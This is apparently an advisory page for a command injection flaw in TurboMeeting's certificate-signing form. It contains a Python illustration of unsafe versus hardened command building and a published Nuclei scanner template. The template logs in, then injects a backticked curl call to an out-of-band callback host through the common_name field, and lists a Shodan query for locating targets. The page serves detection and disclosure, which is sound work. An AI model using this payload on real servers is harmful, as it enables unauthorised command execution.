CVE-2024-38288: TurboMeeting - Post-Authentication Command Injection

Date: 2025-08-01 | Affected software: TurboMeeting | PoC: published

Vulnerability description

The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before passing it to a command executed with privileges.
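As an added illustration (not TurboMeeting's code, which this page does not show), a hypothetical CSR form handler in Python: the unsafe pattern that splices form fields into one shell command line, beside a hardened version that allow-lists each distinguished-name field and hands the subject to openssl as a single argv element with no shell involved. The form field names mirror the PoC's parameters; the openssl invocation, file names and sample request are assumptions.

```python
import re
import subprocess
from typing import Dict, List

# Allow-list for X.509 subject fields: letters, digits, space, dot, hyphen (max 64 chars).
# Quotes, backticks, $, ;, &, |, / and = are deliberately excluded.
DN_FIELD_RE = re.compile(r"[A-Za-z0-9 .\-]{1,64}")
COUNTRY_RE = re.compile(r"[A-Z]{2}")

# Form parameter -> subject attribute; only these fields ever reach the subject string.
SUBJECT_FIELDS = {"common_name": "CN", "company_name": "O", "state": "ST", "city": "L", "country": "C"}

# Constructed sample request, as a legitimate admin would submit it.
SAMPLE_REQUEST = {"common_name": "meet.example.com", "company_name": "Example Inc",
                  "state": "CA", "city": "San Jose", "country": "US"}


def build_csr_command_unsafe(fields: Dict[str, str]) -> str:
    """Vulnerable pattern (illustration only, never run here): form values are spliced into a
    shell command line, so a quote or backtick in common_name closes the -subj argument and
    the remainder of the value is interpreted by the shell."""
    subj = "/".join(f"{attr}={fields.get(f, '')}" for f, attr in SUBJECT_FIELDS.items())
    return f'openssl req -new -key server.key -out server.csr -subj "/{subj}"'


def validate_fields(fields: Dict[str, str]) -> Dict[str, str]:
    """Raise ValueError for any field that does not fully match its allow-list pattern."""
    clean = {}
    for form_name in SUBJECT_FIELDS:
        value = fields.get(form_name, "")
        pattern = COUNTRY_RE if form_name == "country" else DN_FIELD_RE
        if not pattern.fullmatch(value):
            raise ValueError(f"invalid value for {form_name}")
        clean[form_name] = value
    return clean


def is_safe_input(fields: Dict[str, str]) -> bool:
    """Boolean wrapper for a form handler: True only when every field passes validation."""
    try:
        validate_fields(fields)
        return True
    except ValueError:
        return False


def build_csr_argv(fields: Dict[str, str]) -> List[str]:
    """Hardened form: validated values, argv list, no shell. The subject is one argv element,
    so even a weaker allow-list could not turn it into extra shell commands."""
    clean = validate_fields(fields)
    subj = "/" + "/".join(f"{SUBJECT_FIELDS[f]}={clean[f]}" for f in SUBJECT_FIELDS)
    return ["openssl", "req", "-new", "-key", "server.key", "-out", "server.csr", "-subj", subj]


def generate_csr(fields: Dict[str, str]) -> subprocess.CompletedProcess:
    # shell=False (the default): argv goes straight to execve, no word splitting or substitution.
    return subprocess.run(build_csr_argv(fields), capture_output=True, text=True, check=True)
```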

PoC code [published]

id: CVE-2024-38288

info:
  name: TurboMeeting - Post-Authentication Command Injection
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed privileges.
  reference:
    - https://github.com/google/security-research/security/advisories/GHSA-gx6g-8mvx-3q5c
    - https://www.rhubcom.com/v5/manuals.html
  classification:
    epss-score: 0.61781
    epss-percentile: 0.98291
    cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"TurboMeeting"
    product: turbomeeting
    vendor: rhubcom
  tags: cve,cve2024,rce,turbomeeting,authenticated

variables:
  username: "{{username}}"
  password: "{{password}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /as/wapi/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        next_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login

    matchers:
      - type: word
        part: body
        words:
          - "as/wapi/profile_entry?sid="
        internal: true

    extractors:
      - type: regex
        name: sid
        part: body
        group: 1
        regex:
          - 'sid=(.*?)"'
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /as/wapi/generate_csr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sid={{sid}}&common_name=1"%20out%20/dev/null"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - CSR
          - SSL
        condition: and

      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
# digest: 4a0a00473045022100a2ac902fa9ca748424182126653cca0c957ce110567211b56acee74b17163a0b022027775c55111a9c4a350fe2091ec2e6b4973314ad887ecc5b0d177b1a41ba1497:922c64590222798bb761d5b6d8e72950
